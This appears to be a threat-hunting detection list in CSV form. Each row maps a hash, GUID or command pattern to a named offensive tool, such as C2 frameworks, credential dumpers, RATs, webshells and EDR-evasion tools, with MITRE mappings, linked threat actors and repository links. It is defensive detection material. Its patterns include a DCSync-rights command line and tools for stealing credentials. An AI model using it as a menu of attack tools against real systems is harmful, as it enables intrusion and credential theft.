"*d9fd35586f323c9990b3da5c7c1f07c05ff88bc7*",".{0,1000}d9fd35586f323c9990b3da5c7c1f07c05ff88bc7.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. 
Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","40044" "*DA06A931-7DCA-4149-853D-641B8FAA1AB9*",".{0,1000}DA06A931\-7DCA\-4149\-853D\-641B8FAA1AB9.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","#GUIDproject","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","40045" "*DA0A017BDD91FE21E8580F8AC005B497743635E73649764D132726E341171D50*",".{0,1000}DA0A017BDD91FE21E8580F8AC005B497743635E73649764D132726E341171D50.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","40046" "*da1198d8820ab8ff3a617970dbab3f1476c90a87f69a6deb98dbd02026f7e829*",".{0,1000}da1198d8820ab8ff3a617970dbab3f1476c90a87f69a6deb98dbd02026f7e829.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40048" 
"*da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c*",".{0,1000}da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40049" "*DA1B7904-0DDC-45A0-875F-33BBA2236C44*",".{0,1000}DA1B7904\-0DDC\-45A0\-875F\-33BBA2236C44.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#GUIDproject","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","40051" "*DA230B64-14EA-4D49-96E1-FA5EFED9010B*",".{0,1000}DA230B64\-14EA\-4D49\-96E1\-FA5EFED9010B.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","40052" "*da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97*",".{0,1000}da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40053" "*da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea*",".{0,1000}da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40054" "*da343e48b3effaf3c6e6ce3916276d06c7406b8fd0641e7629b731c1fc03526f*",".{0,1000}da343e48b3effaf3c6e6ce3916276d06c7406b8fd0641e7629b731c1fc03526f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40055" "*da34a400c7a113947f339714605130170e40ddc09a5663657e2370a0de3b0c4c*",".{0,1000}da34a400c7a113947f339714605130170e40ddc09a5663657e2370a0de3b0c4c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40056" "*da39f93031e1ca0bd919e5a062b01d0bf39b52e88919ebae40a1379523ccab37*",".{0,1000}da39f93031e1ca0bd919e5a062b01d0bf39b52e88919ebae40a1379523ccab37.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40057" "*da46e5b2a4a7fb855ec7ca2d53247ab30f87c4cae8b284f2e793c0f716848fe4*",".{0,1000}da46e5b2a4a7fb855ec7ca2d53247ab30f87c4cae8b284f2e793c0f716848fe4.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","40059" "*da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139*",".{0,1000}da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","40060" 
"*da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef*",".{0,1000}da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","#filehash","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","40061" "*da659d8c05cfcb5f0abe167191665359123643000d12140836c28d204294ceb6*",".{0,1000}da659d8c05cfcb5f0abe167191665359123643000d12140836c28d204294ceb6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40063" "*da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72*",".{0,1000}da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40064" "*da6b27ef40704e6be3aed8b68a5d06482335e34e0a19bf34b900554e1d874726*",".{0,1000}da6b27ef40704e6be3aed8b68a5d06482335e34e0a19bf34b900554e1d874726.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","40065" "*da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95*",".{0,1000}da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40066" 
"*da7c5433975b488f5b5831b7b50ada9f84d720fa4593117685649d25ce408167*",".{0,1000}da7c5433975b488f5b5831b7b50ada9f84d720fa4593117685649d25ce408167.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","40067" "*DA7DF89C-447D-4C2D-9C75-933037BF245E*",".{0,1000}DA7DF89C\-447D\-4C2D\-9C75\-933037BF245E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40068" "*da817f811f9c4b3f118d78bffcccafd6f1a8cb21e505305f6ae45e1583982abc*",".{0,1000}da817f811f9c4b3f118d78bffcccafd6f1a8cb21e505305f6ae45e1583982abc.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","40069" "*da84dfd9b5b5f068189c1a37f2f3003c402ebf6bc1080e70caa82c51ee4c2bc8*",".{0,1000}da84dfd9b5b5f068189c1a37f2f3003c402ebf6bc1080e70caa82c51ee4c2bc8.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#filehash","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","40070" 
"*da8bf03ff487a649c28018f5e4d7bdac0e1ff1ed7ed67d6fa1b901c4dbc36a30*",".{0,1000}da8bf03ff487a649c28018f5e4d7bdac0e1ff1ed7ed67d6fa1b901c4dbc36a30.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","40071" "*da8ea1b2c9f697d582cbcf8ef9f61ecdfd4105643cc7da7b026c5333e4b6be58*",".{0,1000}da8ea1b2c9f697d582cbcf8ef9f61ecdfd4105643cc7da7b026c5333e4b6be58.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","40072" "*da9735d88a845e465aa4fe4968df15b97ba4b6565f150a48ead7a3ca7298df93*",".{0,1000}da9735d88a845e465aa4fe4968df15b97ba4b6565f150a48ead7a3ca7298df93.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","40073" "*da9ebc9ba59655b365203b0a48c54ec230ddc0a539bd5b3feccab19a0da5127a*",".{0,1000}da9ebc9ba59655b365203b0a48c54ec230ddc0a539bd5b3feccab19a0da5127a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40074" "*da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93*",".{0,1000}da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40075" "*daa2d41ddbb72ece740bda89d16858223e9549977a2f0bbaab9a48c994ebac27*",".{0,1000}daa2d41ddbb72ece740bda89d16858223e9549977a2f0bbaab9a48c994ebac27.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40076" "*daa394aa061c03a9f3cc0378039e64aadd0a9d05344c8c7bc25cea9c7ace9049*",".{0,1000}daa394aa061c03a9f3cc0378039e64aadd0a9d05344c8c7bc25cea9c7ace9049.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - 
TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#filehash","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","40077" "*daa60ab697e9a8cd8ec70c7cc31de5692de1c878c425514788229e791c746e6b*",".{0,1000}daa60ab697e9a8cd8ec70c7cc31de5692de1c878c425514788229e791c746e6b.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","40078" "*dab858feab4506727059fda4645865e2029892c6560704a7077433bab5d5ca0e*",".{0,1000}dab858feab4506727059fda4645865e2029892c6560704a7077433bab5d5ca0e.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#filehash","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","40081" "*dabaad1501e39a462ca3ec0e31f7dd0e70e335db0274b8fd03a03a2419037129*",".{0,1000}dabaad1501e39a462ca3ec0e31f7dd0e70e335db0274b8fd03a03a2419037129.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40082" 
"*dabac1fe57c2338d9eb6360fbb4627cdfbec3edd37bab8926333c0610b2499b7*",".{0,1000}dabac1fe57c2338d9eb6360fbb4627cdfbec3edd37bab8926333c0610b2499b7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40083" "*dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1*",".{0,1000}dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40084" "*dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf*",".{0,1000}dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40085" "*dacledit.py -action write -rights DCSync -principal * -target-dn *",".{0,1000}dacledit\.py\s\-action\swrite\s\-rights\sDCSync\s\-principal\s.{0,1000}\s\-target\-dn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40087" 
"*dad3df98ecb98bce9aee81b110ce6fca2ebba82fd56df1507b0a97688eb8d9bc*",".{0,1000}dad3df98ecb98bce9aee81b110ce6fca2ebba82fd56df1507b0a97688eb8d9bc.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","40088" "*dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d*",".{0,1000}dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40089" "*dadf9d853d94eb24a563cc2bba0c5539c8e92bf6340ac823f00af44b25a5a148*",".{0,1000}dadf9d853d94eb24a563cc2bba0c5539c8e92bf6340ac823f00af44b25a5a148.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40090" "*dae0a69520b475e30675c010e3e563fb4b293032353f13ccd73000c697cdc93d*",".{0,1000}dae0a69520b475e30675c010e3e563fb4b293032353f13ccd73000c697cdc93d.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - 
T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","40091" "*DAE3997B-D51B-4D9F-9F11-2EBC6FDDF57C*",".{0,1000}DAE3997B\-D51B\-4D9F\-9F11\-2EBC6FDDF57C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40092" "*dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57*",".{0,1000}dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#filehash","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","40094" "*DAEDF7B3-8262-4892-ADC4-425DD5F85BCA*",".{0,1000}DAEDF7B3\-8262\-4892\-ADC4\-425DD5F85BCA.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#GUIDproject","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","40096" "*daem0nc0re/PrivFu*",".{0,1000}daem0nc0re\/PrivFu.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","40097" "*daem0nc0re/VectorKernel*",".{0,1000}daem0nc0re\/VectorKernel.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","40098" "*daf3ed8ab5cb22d59e4b1de343f15e343c7e2383547f38f550b1e18a3cf8d11d*",".{0,1000}daf3ed8ab5cb22d59e4b1de343f15e343c7e2383547f38f550b1e18a3cf8d11d.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","#filehash","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","40100" "*daf6f6b42fced73af9fb5339935a02d8bedc96719d35a2bc5153d931e310df3b*",".{0,1000}daf6f6b42fced73af9fb5339935a02d8bedc96719d35a2bc5153d931e310df3b.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","40101" 